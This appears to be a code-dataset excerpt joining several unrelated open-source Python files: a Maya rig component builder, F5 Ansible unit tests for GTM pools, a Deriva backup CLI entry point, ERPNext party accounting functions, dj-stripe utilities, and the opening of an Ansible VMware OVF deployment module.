self.cmpdata[name] = inputGrp
def addCustomPartsGroup(self, name):
grpName = "{}_{}".format(name, const.GROUP_SUFFIX['master'])
inputGrp = complib.createGroup(grpName, self.name, self.side)
complib.createDefaultMetaData(inputGrp, self.name, self.side, 'componentGroup')
complib.parentTo(inputGrp, self.cmpdata['parts'])
self.cmpdata[name] = inputGrp
def createComponent(self, name = None, side = None):
"""
Builds the component using the name and side supplied and the definition layers
:param name: The name of the component
:param side: The side of the component eg L R M
:type name: String
:type side: String
:return:
"""
GRPSUFX = const.GROUP_SUFFIX['master']
## Define the component layout now
data = self.defineComponent(name, side)
data['name'] = name
data['side'] = side
## Build the groups
## TOP GROUP
grpName = "{GRPSUFX}".format(**locals())
baseGrp = complib.createGroup(grpName, self.name, self.side)
complib.createDefaultMetaData(baseGrp, self.name, self.side, 'componentMasterGroup')
## LAYERS
layers = data[name]["layers"]
for eachLayer in layers:
grpName = "{eachLayer}".format(**locals())
lgrp = complib.createGroup(grpName, self.name, self.side)
complib.createDefaultMetaData(lgrp, self.name, self.side, 'componentGroup')
data[eachLayer] = lgrp
complib.parentTo(lgrp, baseGrp)
### INPUTS
## Doesn't handle buffers, this just does straight single inputs
for eachInput in data[name]['inputs']:
grpName = "{eachInput}_srt".format(**locals())
inputgrp = complib.createGroup(grpName, self.name, self.side)
complib.createDefaultMetaData(inputgrp, self.name, self.side, 'componentGroup')
complib.parentTo(inputgrp, data['input'])
if eachInput == 'componentDomain':
data["componentDomain"] = inputgrp
### PARTS
for eachPart in data[name]['parts']:
grpName = "{eachPart}_{GRPSUFX}".format(**locals())
partsgrp = complib.createGroup(grpName, self.name, self.side)
complib.createDefaultMetaData(partsgrp, self.name, self.side, 'componentGroup')
complib.parentTo(partsgrp, data['parts'])
logger.info('Component {name}_{side} created successfully.'.format(**locals()))
logger.info('Component data: {data}'.format(**locals()))
self.cmpdata = data
logger.info('self.cmpdata: {}'.format(self.cmpdata))
return self.cmpdata
|
jamesbdunlop/defaultMayaLibrary
|
tools/rigComponentBuilder.py
|
Python
|
apache-2.0
| 4,466 | 0.005598 |
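A hedged usage sketch of the component builder above; it must run inside Maya (complib ultimately calls maya.cmds), and 'arm'/'L' are arbitrary example values:
comp = Component()
data = comp.createComponent(name='arm', side='L')
# The returned dict maps layer names to the created group nodes.
print(data['input'], data['control'], data['deform'])
# Optional helpers from the class:
comp.addCustomInput('settings')       # adds a 'settings_input' group under the input layer
comp.addCustomPartsGroup('noXform')   # adds an extra group under the parts layer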
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import sys
from nose.plugins.skip import SkipTest
if sys.version_info < (2, 7):
raise SkipTest("F5 Ansible modules require Python >= 2.7")
from units.compat import unittest
from units.compat.mock import Mock
from units.compat.mock import patch
from ansible.module_utils.basic import AnsibleModule
try:
from library.modules.bigip_gtm_pool import ApiParameters
from library.modules.bigip_gtm_pool import ModuleParameters
from library.modules.bigip_gtm_pool import ModuleManager
from library.modules.bigip_gtm_pool import ArgumentSpec
from library.modules.bigip_gtm_pool import UntypedManager
from library.modules.bigip_gtm_pool import TypedManager
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import iControlUnexpectedHTTPError
from test.unit.modules.utils import set_module_args
except ImportError:
try:
from ansible.modules.network.f5.bigip_gtm_pool import ApiParameters
from ansible.modules.network.f5.bigip_gtm_pool import ModuleParameters
from ansible.modules.network.f5.bigip_gtm_pool import ModuleManager
from ansible.modules.network.f5.bigip_gtm_pool import ArgumentSpec
from ansible.modules.network.f5.bigip_gtm_pool import UntypedManager
from ansible.modules.network.f5.bigip_gtm_pool import TypedManager
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import iControlUnexpectedHTTPError
from units.modules.utils import set_module_args
except ImportError:
raise SkipTest("F5 Ansible modules require the f5-sdk Python library")
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def load_fixture(name):
path = os.path.join(fixture_path, name)
if path in fixture_data:
return fixture_data[path]
with open(path) as f:
data = f.read()
try:
data = json.loads(data)
except Exception:
pass
fixture_data[path] = data
return data
class TestParameters(unittest.TestCase):
def test_module_parameters(self):
args = dict(
name='foo',
preferred_lb_method='topology',
alternate_lb_method='ratio',
fallback_lb_method='fewest-hops',
fallback_ip='10.10.10.10',
type='a'
)
p = ModuleParameters(params=args)
assert p.name == 'foo'
assert p.preferred_lb_method == 'topology'
assert p.alternate_lb_method == 'ratio'
assert p.fallback_lb_method == 'fewest-hops'
assert p.fallback_ip == '10.10.10.10'
assert p.type == 'a'
def test_module_parameters_members(self):
args = dict(
partition='Common',
members=[
dict(
server='foo',
virtual_server='bar'
)
]
)
p = ModuleParameters(params=args)
assert len(p.members) == 1
assert p.members[0] == '/Common/foo:bar'
def test_api_parameters(self):
args = dict(
name='foo',
loadBalancingMode='topology',
alternateMode='ratio',
fallbackMode='fewest-hops',
fallbackIp='10.10.10.10'
)
p = ApiParameters(params=args)
assert p.name == 'foo'
assert p.preferred_lb_method == 'topology'
assert p.alternate_lb_method == 'ratio'
assert p.fallback_lb_method == 'fewest-hops'
assert p.fallback_ip == '10.10.10.10'
def test_api_parameters_members(self):
args = load_fixture('load_gtm_pool_a_with_members_1.json')
p = ApiParameters(params=args)
assert len(p.members) == 3
assert p.members[0] == '/Common/server1:vs1'
assert p.members[1] == '/Common/server1:vs2'
assert p.members[2] == '/Common/server1:vs3'
class TestUntypedManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
def test_create_pool(self, *args):
set_module_args(dict(
name='foo',
preferred_lb_method='round-robin',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods in the specific type of manager
tm = UntypedManager(module=module)
tm.exists = Mock(side_effect=[False, True])
tm.create_on_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_12 = Mock(return_value=True)
mm.get_manager = Mock(return_value=tm)
mm.gtm_provisioned = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True
assert results['preferred_lb_method'] == 'round-robin'
def test_update_pool(self, *args):
set_module_args(dict(
name='foo',
preferred_lb_method='topology',
alternate_lb_method='drop-packet',
fallback_lb_method='cpu',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
current = ApiParameters(params=load_fixture('load_gtm_pool_untyped_default.json'))
# Override methods in the specific type of manager
tm = UntypedManager(module=module)
tm.exists = Mock(side_effect=[True, True])
tm.update_on_device = Mock(return_value=True)
tm.read_current_from_device = Mock(return_value=current)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_12 = Mock(return_value=True)
mm.get_manager = Mock(return_value=tm)
mm.gtm_provisioned = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True
assert results['preferred_lb_method'] == 'topology'
assert results['alternate_lb_method'] == 'drop-packet'
assert results['fallback_lb_method'] == 'cpu'
def test_delete_pool(self, *args):
set_module_args(dict(
name='foo',
state='absent',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods in the specific type of manager
tm = UntypedManager(module=module)
tm.exists = Mock(side_effect=[True, False])
tm.remove_from_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_12 = Mock(return_value=True)
mm.get_manager = Mock(return_value=tm)
mm.gtm_provisioned = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True
class TestTypedManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
def test_create_pool(self, *args):
set_module_args(dict(
name='foo',
preferred_lb_method='round-robin',
type='a',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods in the specific type of manager
tm = TypedManager(module=module)
tm.exists = Mock(side_effect=[False, True])
tm.create_on_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_12 = Mock(return_value=False)
mm.get_manager = Mock(return_value=tm)
mm.gtm_provisioned = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True
assert results['preferred_lb_method'] == 'round-robin'
def test_update_pool(self, *args):
set_module_args(dict(
name='foo',
preferred_lb_method='topology',
alternate_lb_method='drop-packet',
fallback_lb_method='cpu',
type='a',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
current = ApiParameters(params=load_fixture('load_gtm_pool_a_default.json'))
# Override methods in the specific type of manager
tm = TypedManager(module=module)
tm.exists = Mock(side_effect=[True, True])
tm.update_on_device = Mock(return_value=True)
tm.read_current_from_device = Mock(return_value=current)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_12 = Mock(return_value=False)
mm.get_manager = Mock(return_value=tm)
mm.gtm_provisioned = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True
assert results['preferred_lb_method'] == 'topology'
assert results['alternate_lb_method'] == 'drop-packet'
assert results['fallback_lb_method'] == 'cpu'
def test_delete_pool(self, *args):
set_module_args(dict(
name='foo',
type='a',
state='absent',
password='password',
server='localhost',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods in the specific type of manager
tm = TypedManager(module=module)
tm.exists = Mock(side_effect=[True, False])
tm.remove_from_device = Mock(return_value=True)
# Override methods to force specific logic in the module to happen
mm = ModuleManager(module=module)
mm.version_is_less_than_12 = Mock(return_value=False)
mm.get_manager = Mock(return_value=tm)
mm.gtm_provisioned = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True
|
alexlo03/ansible
|
test/units/modules/network/f5/test_bigip_gtm_pool.py
|
Python
|
gpl-3.0
| 11,200 | 0.000446 |
import sys
from deriva.transfer import DerivaBackupCLI
DESC = "Deriva Catalog Backup Utility - CLI"
INFO = "For more information see: https://github.com/informatics-isi-edu/deriva-py"
def main():
cli = DerivaBackupCLI(DESC, INFO, hostname_required=True, config_file_required=False)
return cli.main()
if __name__ == '__main__':
sys.exit(main())
|
informatics-isi-edu/deriva-py
|
deriva/transfer/backup/__main__.py
|
Python
|
apache-2.0
| 361 | 0.00554 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
import datetime
from frappe import _, msgprint, scrub
from frappe.defaults import get_user_permissions
from frappe.model.utils import get_fetch_values
from frappe.utils import (add_days, getdate, formatdate, get_first_day, date_diff,
add_years, get_timestamp, nowdate, flt)
from frappe.contacts.doctype.address.address import (get_address_display,
get_default_address, get_company_address)
from frappe.contacts.doctype.contact.contact import get_contact_details, get_default_contact
from erpnext.exceptions import PartyFrozen, PartyDisabled, InvalidAccountCurrency
from erpnext.accounts.utils import get_fiscal_year
from erpnext import get_default_currency, get_company_currency
class DuplicatePartyAccountError(frappe.ValidationError): pass
@frappe.whitelist()
def get_party_details(party=None, account=None, party_type="Customer", company=None,
posting_date=None, price_list=None, currency=None, doctype=None, ignore_permissions=False):
if not party:
return {}
if not frappe.db.exists(party_type, party):
frappe.throw(_("{0}: {1} does not exists").format(party_type, party))
return _get_party_details(party, account, party_type,
company, posting_date, price_list, currency, doctype, ignore_permissions)
def _get_party_details(party=None, account=None, party_type="Customer", company=None,
posting_date=None, price_list=None, currency=None, doctype=None, ignore_permissions=False):
out = frappe._dict(set_account_and_due_date(party, account, party_type, company, posting_date, doctype))
party = out[party_type.lower()]
if not ignore_permissions and not frappe.has_permission(party_type, "read", party):
frappe.throw(_("Not permitted for {0}").format(party), frappe.PermissionError)
party = frappe.get_doc(party_type, party)
currency = party.default_currency if party.default_currency else get_company_currency(company)
set_address_details(out, party, party_type, doctype, company)
set_contact_details(out, party, party_type)
set_other_values(out, party, party_type)
set_price_list(out, party, party_type, price_list)
out["taxes_and_charges"] = set_taxes(party.name, party_type, posting_date, company, out.customer_group, out.supplier_type)
if not out.get("currency"):
out["currency"] = currency
# sales team
if party_type=="Customer":
out["sales_team"] = [{
"sales_person": d.sales_person,
"allocated_percentage": d.allocated_percentage or None
} for d in party.get("sales_team")]
return out
def set_address_details(out, party, party_type, doctype=None, company=None):
billing_address_field = "customer_address" if party_type == "Lead" \
else party_type.lower() + "_address"
out[billing_address_field] = get_default_address(party_type, party.name)
if doctype:
out.update(get_fetch_values(doctype, billing_address_field, out[billing_address_field]))
# address display
out.address_display = get_address_display(out[billing_address_field])
# shipping address
if party_type in ["Customer", "Lead"]:
out.shipping_address_name = get_default_address(party_type, party.name, 'is_shipping_address')
out.shipping_address = get_address_display(out["shipping_address_name"])
if doctype:
out.update(get_fetch_values(doctype, 'shipping_address_name', out.shipping_address_name))
if doctype and doctype in ['Delivery Note', 'Sales Invoice']:
out.update(get_company_address(company))
if out.company_address:
out.update(get_fetch_values(doctype, 'company_address', out.company_address))
def set_contact_details(out, party, party_type):
out.contact_person = get_default_contact(party_type, party.name)
if not out.contact_person:
out.update({
"contact_person": None,
"contact_display": None,
"contact_email": None,
"contact_mobile": None,
"contact_phone": None,
"contact_designation": None,
"contact_department": None
})
else:
out.update(get_contact_details(out.contact_person))
def set_other_values(out, party, party_type):
# copy
if party_type=="Customer":
to_copy = ["customer_name", "customer_group", "territory", "language"]
else:
to_copy = ["supplier_name", "supplier_type", "language"]
for f in to_copy:
out[f] = party.get(f)
# fields prepended with default in Customer doctype
for f in ['currency'] \
+ (['sales_partner', 'commission_rate'] if party_type=="Customer" else []):
if party.get("default_" + f):
out[f] = party.get("default_" + f)
def get_default_price_list(party):
"""Return default price list for party (Document object)"""
if party.default_price_list:
return party.default_price_list
if party.doctype == "Customer":
price_list = frappe.db.get_value("Customer Group",
party.customer_group, "default_price_list")
if price_list:
return price_list
return None
def set_price_list(out, party, party_type, given_price_list):
# price list
price_list = filter(None, get_user_permissions().get("Price List", []))
if isinstance(price_list, list):
price_list = price_list[0] if len(price_list)==1 else None
if not price_list:
price_list = get_default_price_list(party)
if not price_list:
price_list = given_price_list
if price_list:
out.price_list_currency = frappe.db.get_value("Price List", price_list, "currency")
out["selling_price_list" if party.doctype=="Customer" else "buying_price_list"] = price_list
def set_account_and_due_date(party, account, party_type, company, posting_date, doctype):
if doctype not in ["Sales Invoice", "Purchase Invoice"]:
# not an invoice
return {
party_type.lower(): party
}
if party:
account = get_party_account(party_type, party, company)
account_fieldname = "debit_to" if party_type=="Customer" else "credit_to"
out = {
party_type.lower(): party,
account_fieldname : account,
"due_date": get_due_date(posting_date, party_type, party, company)
}
return out
@frappe.whitelist()
def get_party_account(party_type, party, company):
"""Returns the account for the given `party`.
Will first search in party (Customer / Supplier) record, if not found,
will search in group (Customer Group / Supplier Type),
finally will return default."""
if not company:
frappe.throw(_("Please select a Company"))
if party:
account = frappe.db.get_value("Party Account",
{"parenttype": party_type, "parent": party, "company": company}, "account")
if not account and party_type in ['Customer', 'Supplier']:
party_group_doctype = "Customer Group" if party_type=="Customer" else "Supplier Type"
group = frappe.db.get_value(party_type, party, scrub(party_group_doctype))
account = frappe.db.get_value("Party Account",
{"parenttype": party_group_doctype, "parent": group, "company": company}, "account")
if not account and party_type in ['Customer', 'Supplier']:
default_account_name = "default_receivable_account" \
if party_type=="Customer" else "default_payable_account"
account = frappe.db.get_value("Company", company, default_account_name)
existing_gle_currency = get_party_gle_currency(party_type, party, company)
if existing_gle_currency:
if account:
account_currency = frappe.db.get_value("Account", account, "account_currency")
if (account and account_currency != existing_gle_currency) or not account:
account = get_party_gle_account(party_type, party, company)
return account
def get_party_account_currency(party_type, party, company):
def generator():
party_account = get_party_account(party_type, party, company)
return frappe.db.get_value("Account", party_account, "account_currency")
return frappe.local_cache("party_account_currency", (party_type, party, company), generator)
def get_party_gle_currency(party_type, party, company):
def generator():
existing_gle_currency = frappe.db.sql("""select account_currency from `tabGL Entry`
where docstatus=1 and company=%(company)s and party_type=%(party_type)s and party=%(party)s
limit 1""", { "company": company, "party_type": party_type, "party": party })
return existing_gle_currency[0][0] if existing_gle_currency else None
return frappe.local_cache("party_gle_currency", (party_type, party, company), generator,
regenerate_if_none=True)
def get_party_gle_account(party_type, party, company):
def generator():
existing_gle_account = frappe.db.sql("""select account from `tabGL Entry`
where docstatus=1 and company=%(company)s and party_type=%(party_type)s and party=%(party)s
limit 1""", { "company": company, "party_type": party_type, "party": party })
return existing_gle_account[0][0] if existing_gle_account else None
return frappe.local_cache("party_gle_account", (party_type, party, company), generator,
regenerate_if_none=True)
def validate_party_gle_currency(party_type, party, company, party_account_currency=None):
"""Validate party account currency with existing GL Entry's currency"""
if not party_account_currency:
party_account_currency = get_party_account_currency(party_type, party, company)
existing_gle_currency = get_party_gle_currency(party_type, party, company)
if existing_gle_currency and party_account_currency != existing_gle_currency:
frappe.throw(_("Accounting Entry for {0}: {1} can only be made in currency: {2}")
.format(party_type, party, existing_gle_currency), InvalidAccountCurrency)
def validate_party_accounts(doc):
companies = []
for account in doc.get("accounts"):
if account.company in companies:
frappe.throw(_("There can only be 1 Account per Company in {0} {1}")
.format(doc.doctype, doc.name), DuplicatePartyAccountError)
else:
companies.append(account.company)
party_account_currency = frappe.db.get_value("Account", account.account, "account_currency")
existing_gle_currency = get_party_gle_currency(doc.doctype, doc.name, account.company)
company_default_currency = frappe.db.get_value("Company",
frappe.db.get_default("Company"), "default_currency", cache=True)
if existing_gle_currency and party_account_currency != existing_gle_currency:
frappe.throw(_("Accounting entries have already been made in currency {0} for company {1}. Please select a receivable or payable account with currency {0}.").format(existing_gle_currency, account.company))
if doc.get("default_currency") and party_account_currency and company_default_currency:
if doc.default_currency != party_account_currency and doc.default_currency != company_default_currency:
frappe.throw(_("Billing currency must be equal to either default comapany's currency or party account currency"))
@frappe.whitelist()
def get_due_date(posting_date, party_type, party, company):
"""Set Due Date = Posting Date + Credit Days"""
due_date = None
if posting_date and party:
due_date = posting_date
credit_days_based_on, credit_days = get_credit_days(party_type, party, company)
if credit_days_based_on == "Fixed Days" and credit_days:
due_date = add_days(posting_date, credit_days)
elif credit_days_based_on == "Last Day of the Next Month":
due_date = (get_first_day(posting_date, 0, 2) + datetime.timedelta(-1)).strftime("%Y-%m-%d")
return due_date
def get_credit_days(party_type, party, company):
credit_days = 0
if party_type and party:
if party_type == "Customer":
credit_days_based_on, credit_days, customer_group = \
frappe.db.get_value(party_type, party, ["credit_days_based_on", "credit_days", "customer_group"])
else:
credit_days_based_on, credit_days, supplier_type = \
frappe.db.get_value(party_type, party, ["credit_days_based_on", "credit_days", "supplier_type"])
if not credit_days_based_on:
if party_type == "Customer" and customer_group:
credit_days_based_on, credit_days = \
frappe.db.get_value("Customer Group", customer_group, ["credit_days_based_on", "credit_days"])
elif party_type == "Supplier" and supplier_type:
credit_days_based_on, credit_days = \
frappe.db.get_value("Supplier Type", supplier_type, ["credit_days_based_on", "credit_days"])
if not credit_days_based_on:
credit_days_based_on, credit_days = \
frappe.db.get_value("Company", company, ["credit_days_based_on", "credit_days"])
return credit_days_based_on, credit_days
def validate_due_date(posting_date, due_date, party_type, party, company):
if getdate(due_date) < getdate(posting_date):
frappe.throw(_("Due Date cannot be before Posting Date"))
else:
default_due_date = get_due_date(posting_date, party_type, party, company)
if not default_due_date:
return
if default_due_date != posting_date and getdate(due_date) > getdate(default_due_date):
is_credit_controller = frappe.db.get_single_value("Accounts Settings", "credit_controller") in frappe.get_roles()
if is_credit_controller:
msgprint(_("Note: Due / Reference Date exceeds allowed customer credit days by {0} day(s)")
.format(date_diff(due_date, default_due_date)))
else:
frappe.throw(_("Due / Reference Date cannot be after {0}").format(formatdate(default_due_date)))
@frappe.whitelist()
def set_taxes(party, party_type, posting_date, company, customer_group=None, supplier_type=None,
billing_address=None, shipping_address=None, use_for_shopping_cart=None):
from erpnext.accounts.doctype.tax_rule.tax_rule import get_tax_template, get_party_details
args = {
party_type.lower(): party,
"company": company
}
if customer_group:
args['customer_group'] = customer_group
if supplier_type:
args['supplier_type'] = supplier_type
if billing_address or shipping_address:
args.update(get_party_details(party, party_type, {"billing_address": billing_address, \
"shipping_address": shipping_address }))
else:
args.update(get_party_details(party, party_type))
if party_type in ("Customer", "Lead"):
args.update({"tax_type": "Sales"})
if party_type=='Lead':
args['customer'] = None
del args['lead']
else:
args.update({"tax_type": "Purchase"})
if use_for_shopping_cart:
args.update({"use_for_shopping_cart": use_for_shopping_cart})
return get_tax_template(posting_date, args)
def validate_party_frozen_disabled(party_type, party_name):
if party_type and party_name:
if party_type in ("Customer", "Supplier"):
party = frappe.db.get_value(party_type, party_name, ["is_frozen", "disabled"], as_dict=True)
if party.disabled:
frappe.throw(_("{0} {1} is disabled").format(party_type, party_name), PartyDisabled)
elif party.get("is_frozen"):
frozen_accounts_modifier = frappe.db.get_value('Accounts Settings', None, 'frozen_accounts_modifier')
if frozen_accounts_modifier not in frappe.get_roles():
frappe.throw(_("{0} {1} is frozen").format(party_type, party_name), PartyFrozen)
elif party_type == "Employee":
if frappe.db.get_value("Employee", party_name, "status") == "Left":
frappe.msgprint(_("{0} {1} is not active").format(party_type, party_name), alert=True)
def get_timeline_data(doctype, name):
'''returns timeline data for the past one year'''
from frappe.desk.form.load import get_communication_data
out = {}
data = get_communication_data(doctype, name,
fields = 'date(creation), count(name)',
after = add_years(None, -1).strftime('%Y-%m-%d'),
group_by='group by date(creation)', as_dict=False)
timeline_items = dict(data)
for date, count in timeline_items.iteritems():
timestamp = get_timestamp(date)
out.update({ timestamp: count })
return out
def get_dashboard_info(party_type, party):
current_fiscal_year = get_fiscal_year(nowdate(), as_dict=True)
company = frappe.db.get_default("company") or frappe.get_all("Company")[0].name
party_account_currency = get_party_account_currency(party_type, party, company)
company_default_currency = get_default_currency() \
or frappe.db.get_value('Company', company, 'default_currency')
if party_account_currency==company_default_currency:
total_field = "base_grand_total"
else:
total_field = "grand_total"
doctype = "Sales Invoice" if party_type=="Customer" else "Purchase Invoice"
billing_this_year = frappe.db.sql("""
select sum({0})
from `tab{1}`
where {2}=%s and docstatus=1 and posting_date between %s and %s
""".format(total_field, doctype, party_type.lower()),
(party, current_fiscal_year.year_start_date, current_fiscal_year.year_end_date))
total_unpaid = frappe.db.sql("""
select sum(debit_in_account_currency) - sum(credit_in_account_currency)
from `tabGL Entry`
where party_type = %s and party=%s""", (party_type, party))
info = {}
info["billing_this_year"] = flt(billing_this_year[0][0]) if billing_this_year else 0
info["currency"] = party_account_currency
info["total_unpaid"] = flt(total_unpaid[0][0]) if total_unpaid else 0
if party_type == "Supplier":
info["total_unpaid"] = -1 * info["total_unpaid"]
return info
|
emmuchira/kps_erp
|
erpnext/accounts/party.py
|
Python
|
gpl-3.0
| 16,798 | 0.025063 |
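A framework-free sketch of the two credit-term rules applied by get_due_date/get_credit_days in the file above ("Fixed Days" and "Last Day of the Next Month"). The helper names and the simplified signature are assumptions for illustration; the real code resolves credit_days_based_on and credit_days from the party, its group and the company through frappe.db.

import calendar
import datetime

def last_day_of_next_month(d):
    # roll over to the next month, then take its last calendar day
    year, month = (d.year, d.month + 1) if d.month < 12 else (d.year + 1, 1)
    return datetime.date(year, month, calendar.monthrange(year, month)[1])

def due_date_sketch(posting_date, credit_days_based_on=None, credit_days=0):
    if credit_days_based_on == "Fixed Days" and credit_days:
        return posting_date + datetime.timedelta(days=credit_days)
    if credit_days_based_on == "Last Day of the Next Month":
        return last_day_of_next_month(posting_date)
    return posting_date  # no credit terms resolved: due on the posting date

# due_date_sketch(datetime.date(2017, 1, 15), "Fixed Days", 30) -> 2017-02-14
# due_date_sketch(datetime.date(2017, 1, 15), "Last Day of the Next Month") -> 2017-02-28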
# -*- coding: utf-8 -*-
"""
.. module:: djstripe.utils.
:synopsis: dj-stripe - Utility functions related to the djstripe app.
.. moduleauthor:: @kavdev, @pydanny, @wahuneke
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import datetime
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AnonymousUser
from django.core.exceptions import ImproperlyConfigured
from django.db.models.query import QuerySet
from django.utils import timezone
ANONYMOUS_USER_ERROR_MSG = (
"dj-stripe's payment checking mechanisms require the user "
"be authenticated before use. Please use django.contrib.auth's "
"login_required decorator or a LoginRequiredMixin. "
"Please read the warning at "
"http://dj-stripe.readthedocs.org/en/latest/usage.html#ongoing-subscriptions."
)
def subscriber_has_active_subscription(subscriber, plan=None):
"""
Helper function to check if a subscriber has an active subscription.
Throws ImproperlyConfigured if the subscriber is an instance of AUTH_USER_MODEL
and get_user_model().is_anonymous == True.
Active subscription rules (or):
* customer has active subscription
If the subscriber is an instance of AUTH_USER_MODEL, active subscription rules (or):
* customer has active subscription
* user.is_superuser
* user.is_staff
:param subscriber: The subscriber for which to check for an active subscription.
:type subscriber: dj-stripe subscriber
:param plan: The plan for which to check for an active subscription. If plan is None and
there exists only one subscription, this method will check if that subscription
is active. Calling this method with no plan and multiple subscriptions will throw
an exception.
:type plan: Plan or string (plan ID)
"""
if isinstance(subscriber, AnonymousUser):
raise ImproperlyConfigured(ANONYMOUS_USER_ERROR_MSG)
if isinstance(subscriber, get_user_model()):
if subscriber.is_superuser or subscriber.is_staff:
return True
from .models import Customer
customer, created = Customer.get_or_create(subscriber)
if created or not customer.has_active_subscription(plan):
return False
return True
def get_supported_currency_choices(api_key):
"""
Pull a stripe account's supported currencies and returns a choices tuple of those supported currencies.
:param api_key: The api key associated with the account from which to pull data.
:type api_key: str
"""
import stripe
stripe.api_key = api_key
account = stripe.Account.retrieve()
supported_payment_currencies = stripe.CountrySpec.retrieve(account["country"])["supported_payment_currencies"]
return [(currency, currency.upper()) for currency in supported_payment_currencies]
def dict_nested_accessor(d, name):
"""
Access a dictionary value, possibly in a nested dictionary.
>>> dict_nested_accessor({'id': 'joe'}, 'id')
"joe"
>>> dict_nested_accessor({'inner': {'id': 'joe'}}, 'inner.id')
"joe"
:type d: dict
"""
names = name.split(".", 1)
if len(names) > 1:
return dict_nested_accessor(d[names[0]], names[1])
else:
return d[name]
def clear_expired_idempotency_keys():
from .models import IdempotencyKey
threshold = timezone.now() - datetime.timedelta(hours=24)
IdempotencyKey.objects.filter(created__lt=threshold).delete()
def convert_tstamp(response):
"""
Convert a Stripe API timestamp response (unix epoch) to a native datetime.
:rtype: datetime
"""
if response is None:
# Allow passing None to convert_tstamp()
return response
# Overrides the set timezone to UTC - I think...
tz = timezone.utc if settings.USE_TZ else None
return datetime.datetime.fromtimestamp(response, tz)
# TODO: Finish this.
CURRENCY_SIGILS = {
"CAD": "$",
"EUR": "€",
"GBP": "£",
"USD": "$",
}
def get_friendly_currency_amount(amount, currency):
currency = currency.upper()
sigil = CURRENCY_SIGILS.get(currency, "")
return "{sigil}{amount} {currency}".format(sigil=sigil, amount=amount, currency=currency)
class QuerySetMock(QuerySet):
"""
A mocked QuerySet class that does not handle updates.
Used by UpcomingInvoice.invoiceitems.
"""
@classmethod
def from_iterable(cls, model, iterable):
instance = cls(model)
instance._result_cache = list(iterable)
instance._prefetch_done = True
return instance
def _clone(self):
return self.__class__.from_iterable(self.model, self._result_cache)
def update(self):
return 0
def delete(self):
return 0
|
jameshiew/dj-stripe
|
djstripe/utils.py
|
Python
|
mit
| 4,844 | 0.002685 |
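A short usage sketch of the pure helpers defined in the file above. It assumes a configured Django project (for example a manage.py shell), since importing djstripe.utils pulls in Django's auth models; the event dict and amounts are made up.

from djstripe.utils import dict_nested_accessor, get_friendly_currency_amount

event = {"data": {"object": {"id": "sub_123", "customer": "cus_456"}}}
print(dict_nested_accessor(event, "data.object.customer"))  # "cus_456"
print(get_friendly_currency_amount("10.00", "eur"))         # "€10.00 EUR"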
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Matt Martz <matt@sivel.net>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
author: 'Matt Martz (@sivel)'
short_description: 'Deploys a VMware virtual machine from an OVF or OVA file'
description:
- 'This module can be used to deploy a VMware VM from an OVF or OVA file'
module: vmware_deploy_ovf
notes: []
options:
allow_duplicates:
default: "yes"
description:
- Whether or not to allow duplicate VM names. ESXi allows duplicates, vCenter may not.
type: bool
datacenter:
default: ha-datacenter
description:
- Datacenter to deploy to.
type: str
cluster:
description:
- Cluster to deploy to.
type: str
datastore:
default: datastore1
description:
- Datastore to deploy to.
- "You can also specify datastore storage cluster. version_added: 2.9"
type: str
deployment_option:
description:
- The key of the chosen deployment option.
type: str
disk_provisioning:
choices:
- flat
- eagerZeroedThick
- monolithicSparse
- twoGbMaxExtentSparse
- twoGbMaxExtentFlat
- thin
- sparse
- thick
- seSparse
- monolithicFlat
default: thin
description:
- Disk provisioning type.
type: str
fail_on_spec_warnings:
description:
- Cause the module to treat OVF Import Spec warnings as errors.
default: "no"
type: bool
folder:
description:
- Absolute path of folder to place the virtual machine.
- If not specified, defaults to the value of C(datacenter.vmFolder).
- 'Examples:'
- ' folder: /ha-datacenter/vm'
- ' folder: ha-datacenter/vm'
- ' folder: /datacenter1/vm'
